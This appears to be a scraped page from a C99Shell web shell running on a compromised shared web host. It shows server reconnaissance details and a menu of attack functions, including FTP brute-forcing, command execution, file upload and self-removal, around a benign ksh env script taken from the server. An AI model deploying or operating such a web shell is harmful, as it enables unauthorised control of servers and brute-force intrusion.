!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/share/doc/ksh93u+m/ksh/scripts/   drwxr-xr-x
Free 714.16 GB of 879.6 GB (81.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     env.txt (1.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#! /usr/bin/ksh
# shell version of env command
case $(getopts '[-]' opt '--???man' 2>&1) in
version=[0-9]*)
    usage=$'[-?@(#)env (AT&T Labs Research) 1999-05-20\n]
        [-author?David Korn <[email protected]>]
        [-license?http://www.research.att.com/sw/tools/reuse]
        [+NAME?env - set environment for command invocation]
        [+DESCRIPTION?\benv\b modifies the current environment according
		to the \aname\a\b=\b\avalue\a arguments, and then
		invokes \acommand\a with the modified environment.]
	[+?If \acommand\a is not specified, the resulting environment
		is written to standard output quoted as required for
		reading by the \bsh\b.]
	[i:ignore-environment?Invoke \acommand\a with the exact environment
		specified by the \aname\a\b=\b\avalue\a arguments; inherited
		environment variables are ignored.  As an obsolete feature,
		\b-\b by itself can be specified instead of \b-i\b.]
	[u:unset]:[name?Unset the environment variable \aname\a if it was
		in the environment.  This option can be repeated to unset
		additional variables.]

	[name=value]... [command ...]

	[+EXIT STATUS?If \acommand\a is invoked, the exit status of \benv\b
		will be that of \acommand\a.  Otherwise, it will be one of
		the following:]{
	        [+0?\benv\b completed successfully.]
	        [+126?\acommand\a was found but could not be invoked.]
	        [+127?\acommand\a could not be found.]
	}
        [+SEE ALSO?\bsh\b(1), \bexport\b(1)]
    '
    ;;
*)
    usage='iu:[name] [name=value]... [command ...]'
    ;;
esac
clear=
while	getopts  "$usage" var
do	case $var in
	i)	clear=1;;
	u)	command unset $OPTARG 2> /dev/null;;
	esac
done
#[[ $var == "" ]] || exit 1
shift $((OPTIND-1))
if	[[ $1 == - ]]  # obsolete form
then	clear=1
	shift
fi
if	[[ $clear == 1 ]]
then	typeset +x $(typeset +x)
fi
while	true
do	case $1 in
	*=*)	export "$1";;
	*) break;;
	esac
	shift
done
if	(( $# >0 ))
then	exec "$@"
else	export
	exit 0
fi

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0665 ]--